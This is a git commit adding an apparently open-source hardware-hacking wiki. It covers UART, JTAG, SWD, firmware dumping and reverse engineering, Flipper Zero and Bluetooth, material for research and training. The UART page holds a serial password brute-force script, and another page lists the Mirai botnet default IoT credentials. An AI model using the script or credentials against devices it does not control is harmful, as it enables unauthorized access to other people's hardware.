Initial commit

hacktober-logo
Swissky 2022-09-27 11:47:19 +02:00
parent c2c5968910
commit 3cb2a33886
32 changed files with 2515 additions and 0 deletions

34
.github/workflows/ci.yml vendored Normal file
View File

@ -0,0 +1,34 @@
name: ci
on:
push:
branches:
- master
- main
# At minute 0 past every 6th hour
schedule:
- cron: "0 */6 * * *"
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
with:
submodules: recursive
# - uses: actions/checkout@v2
# - name: Checkout submodules
# shell: bash
# run: |
# git config --global user.email "you@example.com"
# git config --global user.name "Your Name"
# git config --global pull.rebase false
# git submodule add https://github.com/swisskyrepo/HardwareAllTheThings docs
- uses: actions/setup-python@v2
with:
python-version: 3.x
- run: pip install mkdocs-material
- run: pip install mkdocs-git-revision-date-localized-plugin
- run: pip install mkdocs-git-committers-plugin
- run: mkdocs gh-deploy --force

21
LICENSE Normal file
View File

@ -0,0 +1,21 @@
MIT License
Copyright (c) 2021 Swissky
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

10
docs/README.md Normal file
View File

@ -0,0 +1,10 @@
---
description: PayloadsAllTheThings for Hardware
coverY: 0
---
# 🔌 Hardware All The Things
## Welcome to the Hardware wiki!
:warning: Informations from this repository is very dense, you may encounter information overflow

BIN
docs/assets/image.png Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 305 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 255 KiB

Binary file not shown.

After

Width:  |  Height:  |  Size: 191 KiB

View File

@ -0,0 +1,93 @@
---
cover: >-
https://images.unsplash.com/photo-1526304640581-d334cdbbf45e?ixid=MnwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8&ixlib=rb-1.2.1&auto=format&fit=crop&w=2970&q=80
coverY: 0
---
# UART
****
### Summary
* UART
* Connect to serial port
* Detect baudrate
* Interact with the /dev/ttyUSB0
* UART over BLE
* Examples
### UART
> Investigations began by attaching a multimeter to the outputs and reading the voltage. Three of the outputs read 3.3V and the fourth 0.02V. The fourth pin was ground. A UART or serial interface typically consists of 4 pins, power, transmit, receive and ground it was therefore hypothesized that the pins maybe utilised for this purpose.
```powershell
# sudo pip3 install pyserial
VCC <-> 5V
RX <-> TX
TX <-> RX
GND <-> GND
```
The ground can be found out using the continuity test in multimeter. Usually all the GROUND PINs of every component/chip of a device are connected to each other and are also connected with almost all the metal parts of the hardware. We can easily understand which are the GROUND PINs by connecting every PIN with a metal part and verifying if the current flows. The header that produces beep sound on being touched is the ground (ohmmeter).
The VCC can be found out using the voltage test. One of the pin is kept on the identified ground and other on any of the 3 pins. If you get a constant high voltage means that it is a VCC pin .
### Connect to serial port
Connect to UART using an USB to TTL, then find the `/dev/ttyUSB0` device in the `dmesg` command output. You need to create the `dialout` group for Debian or `uucp` for Manjaro :
* `sudo usermod -a -G dialout username`
* `sudo gpasswd -a username uucp`
#### Detect baudrate
Standard baud rate are `110`, `300`, `600`, `1200`, `2400`, `4800`, `9600`, `14400`, `19200`, `38400`, `57600`, `115200`, `128000` and `256000`.\
Auto-detect baud rate using the script : https://github.com/devttys0/baudrate/blob/master/baudrate.py
#### Interact with the /dev/ttyUSB0
```powershell
cu -l /dev/ttyUSB0 -s 9600
screen port_name 115200
minicom -b 115200 -o -D Port_Name # to exit GNU screen, type Control-A k.
microcom -d -s 9600 -p /dev/ttyUSB0
microcom -d -s 19200 -p /dev/ttyUSB0
```
```python
import serial, time
port = "/dev/ttyUSB0"
baud = 9600
s = serial.Serial(port)
s.baudrate = baud
with open('/home/audit/Documents/IOT/passwords.lst', 'r') as f:
lines = f.readlines()
for pwd in lines:
a = s.write(pwd.strip())
print("Pwd: {}".format(pwd.strip()))
print("Sent {} bytes".format(a))
print("Result: {}".format(s.readline()))
time.sleep(10)
```
### UART over BLE
Its an emulation of serial port over BLE. The UUID of the Nordic UART Service is `6E400001-B5A3-F393-E0A9-E50E24DCCA9E`. This service exposes two characteristics: one for transmitting and one for receiving.
* **RX Characteristic** (UUID: 6E400002-B5A3-F393-E0A9-E50E24DCCA9E) : The peer can send data to the device by writing to the RX Characteristic of the service. ATT Write Request or ATT Write Command can be used. The received data is sent on the UART interface.
* **TX Characteristic** (UUID: 6E400003-B5A3-F393-E0A9-E50E24DCCA9E) : If the peer has enabled notifications for the TX Characteristic, the application can send data to the peer as notifications. The application will transmit all data received over UART as notifications.
* nRF UART 2.0 - Nordic Semiconductor ASA - https://play.google.com/store/apps/details?id=com.nordicsemi.nrfUARTv2
* Specifications - https://infocenter.nordicsemi.com/index.jsp?topic=%2Fcom.nordic.infocenter.sdk5.v14.0.0%2Fble\_sdk\_app\_nus\_eval.html
* https://thejeshgn.com/2016/10/01/uart-over-bluetooth-low-energy/
Example with Micro::bit :
* https://makecode.microbit.org/v1/98535-28913-33692-07418
* https://support.microbit.org/support/solutions/articles/19000062330-using-the-micro-bit-bluetooth-low-energy-uart-serial-over-bluetooth-
### Examples
![](https://developer.android.com/things/images/raspberrypi-console.png) ![](http://remotexy.com/img/help/help-esp8266-firmware-update-usbuart.png)

View File

@ -0,0 +1,75 @@
---
cover: >-
https://images.unsplash.com/photo-1511497584788-876760111969?ixid=MnwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8&ixlib=rb-1.2.1&auto=format&fit=crop&w=3432&q=80
coverY: 0
---
# JTAG
****
### Summary
* JTAG Pins
* JTAGEnum
* References
### JTAG Pins
> Allows testing, debugging, firmware manipulation and boundary scanning
**TCK: Test Clock** The drummer, or metronome that dictates the speed of the TAP controller. Voltage on this pin simply pulses up and down in a rhythmic, steady beat. On every “beat” of the clock, the TAP controller takes a single action. The actual clock speed is not specified in the JTAG standard. The TAP controller accepts its speed from the outside device controlling JTAG.
**TMS: Test Mode Select** Voltages on the Mode Select pin control what action JTAG takes. By manipulating the voltage on this pin, you tell JTAG what you want it to do.
**TDI: Test Data-In** The pin that feeds data into the chip. The JTAG standard does not define protocols for communication over this pin. That is left up to the manufacturer. As far as JTAG is concerned, this pin is simply an ingress method for 1s and 0s to get into the chip. What the chip does with them is irrelevant to JTAG.
**TDO: Test Data-Out** The pin for data coming out of the chip. Like the Data-In pin, communication protocols are not defined by JTAG. TRST: Test Reset (Optional) This optional signal is used to reset JTAG to a known good state, we'll explain why this is optional in a few paragraphs.
AVR has lock bits that protects device from extracting flash
* Removing this lockbits will erase entire device
* If you have them set, youre not lucky, try to get firmware from other sources
```powershell
# Read fuses and lock bits using avarice r
$ avarice --program --file test.elf --part atmega128 --jtag /dev/ttyUSB0 :4444
# Acquire firmware using avrdude
$ avrdude -p m128 -c jtagmkI P /dev/ttyUSB0 -U flash:r:”/home/avr/flash.bin":r
```
### JTAGEnum
JTAGenum is an open source Arduino JTAGenum.ino or RaspbberyPi JTAGenum.sh (experimental) scanner. This code was built with three primary goals:
* Given a large set of pins on a device determine which are JTAG lines
* Enumerate the Instruction Register to find undocumented functionality
⚠️ JTAG and device must share the same ground.
Software Connection Set up:
* Download the INO sketch from the github
* Open the Arduino IDE and Load the downloaded JTAGEnum sketch
* Choose the correct Serial Port and Board
* Compile and Upload the sketch
* Open the Serial Monitor
* Set the correct baud rate
* Enter the command to scan ("s")
Arduino PIN Layout
* Digital PIN 2(Black)
* Digital PIN 3(White)
* Digital PIN 4(Grey)
* Digital PIN 5(Maroon)
* Digital PIN 6(Blue)
* GND - GREEN
![](https://3.bp.blogspot.com/-OmjCNFWbnf0/WKx4NEjfb9I/AAAAAAAADy8/-qz5Of4iDbcT5mtonl6st1hVGrmsGUs4gCLcB/s640/FOUND.png)
### References
* JTAGulator vs. JTAGenum, Tools for Identifying JTAG Pins in IoT Devices by Dylan Ayrey - https://www.praetorian.com/blog/jtagulator-vs-jtagenum-tools-for-identifying-jtag-pins-in-iot-devices?edition=2019
* https://just2secure.blogspot.com/2017/02/jtag-pin-identification.html
* https://wrongbaud.github.io/jtag-hdd/

View File

@ -0,0 +1,3 @@
# SPI
TODO

View File

@ -0,0 +1,20 @@
# SWD
### Summary
* SWD Pins
### SWD pins
* SWCLK: Clock into the core
* SWDIO: Data in / out
JTAG and SWD are similar and can be interfaced with each other:
| JTAG Mode | SWD Mode | Signal |
| --------- | -------- | --------------------------------------------- |
| TCK | SWCLK | Clock into the core |
| TDI | - | JTAG test data input |
| TDO | SWV | JTAG Test data output / SWV trace data output |
| TMS | SWDIO | JTAG test mode select / SWD data in and out |
| GND | GND | - |

View File

@ -0,0 +1,16 @@
# FCC ID
## Searchable FCC ID Database
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission
* [https://fccid.io/](https://fccid.io/)
For legal sale of wireless deices in the US, manufacturers must:
* Have the device evaluated by an independent lab to ensure it conforms to FCC standards
* Provide documentation to the FCC of the lab results
* Provide User Manuals, Documentation, and Photos relating to the device
* [Digitally](https://fccid.io/blog/2014/11/e-label-act/) or physically label the device with the unique identifier provided by the FCC (upon approved application)
\

View File

@ -0,0 +1,151 @@
---
cover: >-
https://images.unsplash.com/photo-1552664730-d307ca884978?ixid=MnwxMjA3fDB8MHxwaG90by1wYWdlfHx8fGVufDB8fHx8&ixlib=rb-1.2.1&auto=format&fit=crop&w=2970&q=80
coverY: 0
---
# Firmware Dumping
### Summary
* Send a new firmware into the microcontroller using serial port
* Dump firmware using debug port
* Convert ihex to elf
* Over-the-air updates
* Explore firmware
* Type of firmware
* Check entropy
* Unsquashfs
* Encrypted firmware
### Send a new firmware into the microcontroller using serial port
```powershell
# send raw data firmware
$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:w:flash_raw.bin
# send ihex firmware
$ avrdude -c usbasp -p m328p -F -U flash:r:dump.hex:i
# default
$ avrdude -c usbasp -p m328p -C /etc/avrdude.conf -U flash:w:hardcodedPassword.ino.arduino_standard.hex
```
### Dump firmware using debug port
* avrdude
```powershell
$ avrdude -p m328p -c usbasp -P /dev/ttyUSB0 -b 9600 -U flash:r:flash_raw.bin:r
$ avrdude -p m328p -c arduino -P /dev/ttyACM0 -b 115200 -U flash:r:flash_raw.bin:r
$ avrdude -p atmega328p -c arduino -P/dev/ttyACM0 -b 115200 -D -U flash:r:program.bin:r -F -v
```
* openocd
Determine code space in the microcontroller (for example nRF51822 - Micro:bit), save as `dump_img.cfg`:
```powershell
init
reset init
halt
dump_image image.bin 0x00000000 0x00040000
exit
```
```powershell
sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg
```
### Convert ihex to elf
> The Intel HEX is a transitional file format for microcontrollers, (E)PROMs, and other devices. The documentation states that HEXs can be converted to binary files and programmed into a configuration device.
Each line in the ihex file starts with :
* a colon :
* followed by ONE BYTE = record length
* followed by TWO BYTES = offset to load
* followed by ONE BYTE = Record Type
* Last BYTE in the line = Checksum
Convert .hex(ihex format) to .elf file with `avr-objcopy` or with an online tool [http://matrixstorm.com](http://matrixstorm.com/avr/hextobin/ihexconverter.html)
```powershell
$ avr-objcopy -I ihex -O elf32-avr dump.hex dump.elf
# or
$ objcopy -I ihex chest.hex -O binary chest.bin ; xxd chest.bin
```
Alternative with Python `bincopy`
```python
import bincopy
import sys
f = bincopy.BinFile()
f.add_ihex_file(sys.argv[1])
print(f.as_binary())
```
Quick strings on .hex
```powershell
cat defaultPassword.ino.arduino_standard.hex | tr -d ":" | tr -d "\n" | xxd -r -p | strings
```
Inspect the assembly with `avr-objdump -m avr -D chest.hex`.\
Emulate : `qemu-system-avr -S -s -nographic -serial tcp::5678,server=on,wait=off -machine uno -bios chest.bin`
### Over-the-air updates
TODO
### Explore firmware
```powershell
$ binwalk -Me file.bin
$ strings file.bin
$ strings -e l file.bin
The strings -e flag specifies the encoding of the characters. -el specifies little-endian characters 16-bits wide (e.g. UTF-16)
$ strings -tx file.bin
The -t flag will return the offset of the string within the file. -tx will return it in hex format, T-to in octal and -td in decimal.
$ dd if=firmware.bin of=firmware.chunk bs=1 skip=$((0x200)) count=$((0x400-0x200))
If we wanted to run it a little faster, we could increase the block size:
$ dd if=firmware.bin of=firmware.chunk bs=$((0x100)) skip=$((0x200/0x100)) count=$(((0x400-0x200)/0x100))
$ binwalk -Y dump.elf
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
3708 0xE7C ARM executable code, 16-bit (Thumb), little endian, at least 522 valid instructions
```
### Type of firmware
* SREC - Motorola S-Record : All S-record file lines start with a capital S.
* Intel HEX lines all start with a colon.
* TI-TXT is a Texas Instruments format, usually for the MSP430 series. Memory addresses are prepended with an **@**, and data is represented in hex.
* Raw NAND dumps
### Check entropy
High entropy = probably encrypted (or compressed). Low entropy = probably not
```powershell
$ binwalk -E fw
```
### Unsquashfs
```powershell
sudo unsquashfs -f -d /media/seagate /tmp/file.squashfs
```
### Encrypted firmware
![](https://images.squarespace-cdn.com/content/v1/5894c269e4fcb5e65a1ed623/1581004558438-UJV08PX8O5NVAQ6Z8HXI/ke17ZwdGBToddI8pDm48kHSRIhhjdVQ3NosuzDMrTulZw-zPPgdn4jUwVcJE1ZvWQUxwkmyExglNqGp0IvTJZamWLI2zvYWH8K3-s\_4yszcp2ryTI0HqTOaaUohrI8PIYASqlw8FVQsXpiBs096GedrrOfpwzeSClfgzB41Jweo/Picture2.png?format=1000w)
* https://www.zerodayinitiative.com/blog/2020/2/6/mindshare-dealing-with-encrypted-router-firmware

View File

@ -0,0 +1,145 @@
# Firmware Reverse Engineering
### Summary
* Loading bare-metal binaries into IDA
* Loading bare-metal binaries into Radare2
* Loading bare-metal binaries into Ghidra
* ESPTool
* nRF5x Firmware disassembly tools
* Pure disassemblers
* Simulating AVR
### Loading bare-metal binaries into IDA
Prerequisite:
* The **load address** is the address in memory that the binary is being executed from.
* The **entry point** is the location within the binary where the processor starts executing.
⚠️ For ARM Arduino firwmare the entry point is located at **\_RESET** interruption.
> To load it properly in IDA, open the file, select ATMEL AVR and then select ATmega323\_L.
https://thanat0s.trollprod.org/2014/01/loader-un-binaire-arduino-dans-ida/
* ESP8266 : https://github.com/themadinventor/ida-xtensa
### Loading bare-metal binaries into Radare2
Radare2 can disassemble `avr`, `arduino` natively
```powershell
$ radare2 -A -a arm -b 32 ihex://Challenge_v3.hex
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] find and analyze function preludes (aap)
[x] Analyze len bytes of instructions for references (aar)
[x] Check for objc references
[x] Check for vtables
[x] Finding xrefs in noncode section with anal.in=io.maps
[x] Analyze value pointers (aav)
[x] Value from 0x00000000 to 0x10001018 (aav)
[x] 0x00000000-0x10001018 in 0x0-0x10001018 (aav)
[x] Emulate code to find computed references (aae)
[x] Type matching analysis for all functions (aaft)
[x] Propagate noreturn information
[x] Use -AA or aaaa to perform additional experimental analysis.
[0x565e8640]> aaaa
[0xf7723a20]> afl
[0xf7723a20]> e asm.describe = true
[0xf7723a20]> s main
[0x0804873b]> pdf
To perform a case-insensitive search for strings use /i:
[0x0001d62c]> /i Exploding
Searching 9 bytes in [0x0-0x10001018]
hits: 1
0x0003819e hit1_0 .. N# NExploding Firmware ! N.
$ r2 -a avr /tmp/flash
[0x000000c4]> afr
[0x000000c4]> pd 17
$ rasm2 -a avr -d "0c94 751b 0c94 9d1b 0c94 d72c"
jmp 0x36ea
jmp 0x373a
jmp 0x59ae
```
### Loading bare-metal binaries into Ghidra
* SVD-Loader for Ghidra: Simplifying bare-metal ARM reverse engineering - https://leveldown.de/blog/svd-loader/
### ESPTool
ESP8266 and ESP32 serial bootloader utility : github.com/espressif/esptool
```powershell
josh@ioteeth:/tmp/reversing$ ~/esptool/esptool.py image_info recovered_file
esptool.py v2.4.0-dev
Image version: 1
Entry point: 4010f29c
1 segments
Segment 1: len 0x00568 load 0x4010f000 file_offs 0x00000008
```
### nRF5x Firmware disassembly tools
* https://github.com/DigitalSecurity/nrf5x-tools
```powershell
$ python3 nrfident.py bin firmwares/s132.bin
Binary file provided firmwares/s132.bin
Computing signature from binary
Signature: d082a85351ee18ecfdc9dcb01352f5df3d938a2270bcadec2ec083e9ceeb3b1e
=========================
SDK version: 14.0.0
SoftDevice version: s132
NRF: nrf52832
=========================
SDK version: 14.1.0
SoftDevice version: s132
NRF: nrf52832
SoftDevice : s132
Card version : xxaa
*****
RAM address : 0x20001368
RAM length : 0xec98
ROM address : 0x23000
ROM length : 0x5d000
```
### Pure disassemblers
* Vavrdisasm -- vAVRdisasm will auto-recognize Atmel Generic, Intel HEX8, and Motorola S-Record files - https://github.com/vsergeev/vavrdisasm
* ODAweb -- https://www.onlinedisassembler.com/odaweb/
* avr-objdump gcc kit standard tool
```powershell
$ avr-objdump -l -t -D -S main.bin > main.bin.dis
$ avr-objdump -m avr -D main.hex > main.hex.dis
```
### Simulating AVR
> Programs compiled for Arduino can be simulated using AVR Studio or the newer Atmel Studio. I have used the former along with hapsim. Hapsim works by hooking into AVR Studio and can simulate peripherals like the UART, LCD etc.
```powershell
$ simulavr -P atmega128 -F 16000000 f build-crumbuino128/ex1.1.elf
```
### UEFI Firmware
Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc - [https://github.com/theopolis/uefi-firmware-parser](https://github.com/theopolis/uefi-firmware-parser)
```
sudo pip install uefi_firmware
$ uefi-firmware-parser --test ~/firmware/*
~/firmware/970E32_1.40: UEFIFirmwareVolume
~/firmware/CO5975P.BIO: EFICapsule
~/firmware/me-03.obj: IntelME
~/firmware/O990-A03.exe: None
~/firmware/O990-A03.exe.hdr: DellPFS
```

View File

@ -0,0 +1,21 @@
# Bus Pirate
![](https://iotmyway.files.wordpress.com/2018/05/mode-guide.png)
### Update Bus Pirate
```powershell
git clone https://github.com/BusPirate/Bus_Pirate.git
cd Bus_Pirate/package/BPv4-firmware/pirate-loader-v4-source/pirate-loader_lnx
sudo ./pirate-loader_lnx --dev=/dev/ttyACM0 --hex=../BPv4-firmware-v6.3-r2151.hex
```
```powershell
# Identify EEPROM chip
sudo flashrom p buspirate_spi:dev=/dev/ttyUSB0
# Dump firmware using a bus pirate (SPI)
sudo flashrom p Buspirate_spi:dev=/dev/ttyUSB0,spispeed=1M c (Chip name) r (Name.bin)
```

View File

@ -0,0 +1,50 @@
---
description: https://flipperzero.one/
---
# Flipper Zero
![FlipperZero](../assets/image.png)
### **Firmwares**
* Flipper Zero Firmware\
[https://github.com/flipperdevices/flipperzero-firmware](https://github.com/flipperdevices/flipperzero-firmware)
* Flipper Zero Unleashed Firmware
[https://github.com/Eng1n33r/flipperzero-firmware](https://github.com/Eng1n33r/flipperzero-firmware)
* Flipper Zero FW \[ROGUEMASTER]
[https://github.com/RogueMaster/flipperzero-firmware-wPlugins](https://github.com/RogueMaster/flipperzero-firmware-wPlugins)
Awesome FlipperZero: [https://github.com/djsime1/awesome-flipperzero](https://github.com/djsime1/awesome-flipperzero)
#### Firmware Update
1. Update to the latest firmware using https://flipperzero.one/update
2. Download and install qFlipper&#x20;
3. Connect your Flipper Zero via USB, update to the official firmware
4. Disconnect from USB, power off the Flipper Zero, and remove the SD to prepare it for flashing.
5. Download the latest RogueMaster firmware from their Github Page. https://github.com/RogueMaster/flipperzero-firmware-wPlugins
6. Unzip the downloaded .zip and copy the content into /update of the Flipper SD card (including the .dfu)
7. On the Flipper Zero, once booted, press down, and left until you are on the 'Browser' screen. Scroll down until you see the 'update' directory and click on it.&#x20;
8. You should now see the contents you uploaded and an 'update' option. Hover over the 'update' option, click the center button on your Flipper, once again on the 'Run in App' option.
### Videos
* Flipper Zero: Want some good news? - Penthertz&#x20;
[https://www.youtube.com/watch?v=tB0eYatvu0k](https://www.youtube.com/watch?v=tB0eYatvu0k)
* Flipper Zero: is this for you? Follow our 1st tests! - Penthertz
[https://www.youtube.com/watch?v=W5YYObSBUno](https://www.youtube.com/watch?v=W5YYObSBUno)
### Tutorials and Resources
* [https://flipper.pingywon.com/flipper/](https://flipper.pingywon.com/flipper/)\
[https://flipper.pingywon.com/](https://flipper.pingywon.com/)
* [https://github.com/UberGuidoZ/Flipper](https://github.com/UberGuidoZ/Flipper)
* [https://interestingsoup.com/n00b-guide-flashing-flipper-zero-to-rougemaster/](https://interestingsoup.com/n00b-guide-flashing-flipper-zero-to-rougemaster/)

103
docs/gadgets/micro-bit.md Normal file
View File

@ -0,0 +1,103 @@
# Micro::bit
### Extract source code from firmware
When the source has been build from https://makecode.microbit.org/#editor, the Javascript code is embedded into the firmware.
```python
import bincopy
import lzma
import sys
import subprocess
import json
# split firmware into raw and code
with open(sys.argv[1],'r') as f:
fwstring = f.read()
fwsplit = fwstring.split('\n\n')
with open('fw_raw.hex', 'w') as g:
g.write(fwsplit[0])
with open('fw_code.hex', 'w') as g:
g.write(fwsplit[1])
# Convert ihex to bin
f = bincopy.BinFile()
f.add_ihex_file('fw_code.hex')
binary = f.as_binary()
print("[+] ihex converted to binary")
## Extract code firmware, bruteforce offset
for i in range(200):
with open('firmware.bin', 'w+b') as g:
g.write(binary[i:])
try:
data = subprocess.run(["lzma", "firmware.bin", "-d", "--stdout"], capture_output=True)
data = data.stdout.decode().split('}',1)
data = data[1][1:]
data = json.loads(data)
print(data)
print("\n[+] Javascript code")
print(data['main.ts'])
except Exception as e:
continue
```
### Extract firmware using SWD
#### Connection
Solder wires on SWD pins:
![](https://i.ibb.co/FJZ3sr3/upload-c19e00cea2e28464c0fb9d4e8f6a6963.png)
Connect to an ST-LINK v2:
![](https://i.ibb.co/KrSJVKc/upload-2a0191d652b242e1762f75379af2b23c.png)
#### OpenOCD profile
Official datasheet of the nRF51822:
> https://infocenter.nordicsemi.com/pdf/nRF51822\_PS\_v3.1.pdf
Code section size:
![](https://i.ibb.co/Zz2wnry/upload-b2444a535e41dacbf5da5fd22dc66d50.png)
![](https://i.ibb.co/z7hgFqg/upload-feec06938e6d30aa212088c38227086e.png)
> hex(1024\*256) = 0x40000 => 0x00040000
```bash
init
reset init
halt
dump_image image.bin 0x00000000 0x00040000
exit
```
```bash
$ sudo openocd -f /home/maki/tools/hardware/openocd/tcl/interface/stlink-v2-1.cfg -f /home/maki/tools/hardware/openocd/tcl/target/nrf51.cfg -f dump_fw.cfg
```
#### Python code
Content of `image.dd` file:
```bash
$ strings image.bin
[...]
main.py# Add your Python code here. E.g.
from microbit import *
while True:
display.scroll('Hello, World!')
displa
y.show(Image.HEART)
sleep(1000)
print("coucou")
sleep(2000)
```

View File

@ -0,0 +1,6 @@
# Pwnagotchi
Documentation: [https://pwnagotchi.ai/](https://pwnagotchi.ai/)
![Pwnagotchi](../assets/image_pwnagotchi.png)

View File

@ -0,0 +1,9 @@
# Raspberry Pi
### Raspberrypi As Poor Mans Hardware Hacking Tool
[https://payatu.com/using-rasberrypi-as-poor-mans-hardware-hacking-tool](https://payatu.com/using-rasberrypi-as-poor-mans-hardware-hacking-tool)
* SPI Serial Peripheral Interface
* I2C Inter-IC Communication
* Debugger JTAG/SWD

View File

@ -0,0 +1,72 @@
# Default IoT Passwords
IoT Device Default Password Lookup : https://www.defpass.com
### Mirai Wordlist
Seclist Mirai Wordlist : https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt
```powershell
root xc3511
root vizxv
root admin
admin admin
root 888888
root xmhdipc
root default
root jauntech
root 123456
root 54321
support support
root (none)
admin password
root root
root 12345
user user
admin (none)
root pass
admin admin1234
root 1111
admin smcadmin
admin 1111
root 666666
root password
root 1234
root klv123
Administrator admin
service service
supervisor supervisor
guest guest
guest 12345
admin1 password
administrator 1234
666666 666666
888888 888888
ubnt ubnt
root klv1234
root Zte521
root hi3518
root jvbzd
root anko
root zlxx.
root 7ujMko0vizxv
root 7ujMko0admin
root system
root ikwb
root dreambox
root user
root realtek
root 000000
admin 1111111
admin 1234
admin 12345
admin 54321
admin 123456
admin 7ujMko0admin
admin pass
admin meinsm
tech tech
mother fucker
```

View File

@ -0,0 +1,34 @@
# Links & Hardware Kits
### Hardware Challenges & CTF
* [BLE CTF](https://github.com/hackgnar/ble\_ctf)
* [Learning Bluetooth Hackery with BLE CTF](http://www.hackgnar.com/2018/06/learning-bluetooth-hackery-with-ble-ctf.html)
* [BLUETOOTH LOW ENERGY CTF - WRITE UP ECLECTIC KOALA](https://blog.tclaverie.eu/posts/bluetooth-low-energy-ctf---write-up)
* [https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/](https://www.pentestpartners.com/security-blog/totally-pwning-the-tapplock-smart-lock/)
* [Damn Vulnerable IoT Device](https://github.com/Vulcainreo/DVID)
* [DVID - Damn Vulnerable IoT Device Challenges' writeup](https://swisskyrepo.github.io/DVID/)
* [IoT Security - Hack the Damn : Vulnerable IoT Device - Arnaud COURTY - @vulcainreo](https://www.triplesec.info/slides/b4ed465329250481e92c97574cd6b3b4.pdf)
* [findTheDatasheet - EN](http://blog.ghozt.ninja/2019/07/19/findthedatasheet/)
* [findTheDatasheet - FR](https://shoxxdj.fr/dvid-hardware-find-the-datasheet/)
* [defaultPassword - FR](https://shoxxdj.fr/dvid-firmware-defaultpassword/)
* [GreHack 2019: IOT Security: Hack The Damn Vulnerable IoT Device - Arnaud Courty](https://www.youtube.com/watch?v=C1vQGfzPWuY)
* Riscure CTF 3
* [Solving AVR reverse engineering challenge with radare2 - rhme2 Jumpy (reversing 100)](https://www.youtube.com/watch?v=zk3JdMOQPc8\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=5)
* [Using UART / Serial to interact with an embedded device - rhme2 Setup](https://www.youtube.com/watch?v=TM-cuV9Nd1E\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=2)
* [SHA1 length extension attack on the Secure Filesystem - rhme2 Secure Filesystem (crypto 100)](https://www.youtube.com/watch?v=6QQ4kgDWQ9w\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=3)
* [Start reverse engineering AVR - Memory Map and I/O Registers - rhme2 Reverse Engineering](https://www.youtube.com/watch?v=D0VKuZuuvW8\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=4)
* [Defeat a stack cookie with bruteforce - rhme2 Photo manager (pwn 100)](https://www.youtube.com/watch?v=01EX0mjya5A\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=6)
* [Format string exploit on an arduino - rhme2 Casino (pwn 150)](https://www.youtube.com/watch?v=fRgNtGXDMlY\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=8)
* [Identifying UART and main() in an AVR firmware (ft. Zeta Two) part 1 - rhme2](https://www.youtube.com/watch?v=hyoPAOTrUMc\&list=PLhixgUqwRTjwNaT40TqIIagv3b4\_bfB7M\&index=23)
* [Reversing Raw Binary Firmware Files in Ghidra](https://gist.github.com/nstarke/ed0aba2c882b8b3078747a567ee00520)
* [Dumper un Arduino - thanatos](https://thanat0s.trollprod.org/2014/01/dumper-un-arduino/)
* [Dumping the Firmware from the device Using buspirate - Veera Babu](http://blog.isecurion.com/2017/07/06/dumping-the-firmware-from-the-device-using-buspirate/)
* [Embedded/IoT Linux for Red-Blue Teams](https://www.pentesteracademy.com/course?id=37)
* [From printed circuits boards to exploits (PWNING IOT DEVICES LIKE A BOSS) @virtualabs | Hack in Paris '18-](https://hackinparis.com/data/slides/2018/talks/HIP2018\_Damien\_Cauquil\_From\_Printed\_Circuit\_Boards\_To\_Exploits.pdf)
### Hardware Kit
![HW1](https://i.ibb.co/WW55LH4/Hardware-Toolkit.jpg) ![HW2](https://i.ibb.co/F3vRmgV/Hardware-Toolkit2.jpg) ![DVID1](https://github.com/Vulcainreo/DVID/raw/master/kit-contents.jpg) ![Ph0wn Basic](https://pbs.twimg.com/media/ELVWNyKWwAAPa0T?format=jpg\&name=900x900)

168
docs/protocols/bluetooth.md Normal file
View File

@ -0,0 +1,168 @@
# Bluetooth
### Challenge
* BLE HackMe (https://www.microsoft.com/store/apps/9N7PNVS9J1B7) - works with nRF Connect (Android), [Introduction\_to\_BLE\_security](http://smartlockpicking.com/slides/HITB\_Cyberweek\_2020\_A\_Practical\_Introduction\_to\_BLE\_security.pdf) / https://github.com/smartlockpicking/BLE\_HackMe
### Bluetooth configuration for Kali Linux
```powershell
$ sudo apt-get install bluetooth blueman bluez
$ sudo systemctl start bluetooth
$ sudo hciconfig hci0 up
$ sudo hcitool lescan
00:1A:7D:DA:71:06 Ph0wn Beacon
25:55:84:20:73:70 (unknown
```
Apt doesn't have a recent version of bluez, recompile it with the following lines.
```powershell
wget https://www.kernel.org/pub/linux/bluetooth/bluez-5.18.tar.xz
dpkg --get-selections | grep -v deinstall | grep bluez
tar xvf bluez-5.18.tar.xz
sudo apt-get install libglib2.0-dev libdbus-1-dev libusb-dev libudev-dev libical-dev systemd libreadline-dev
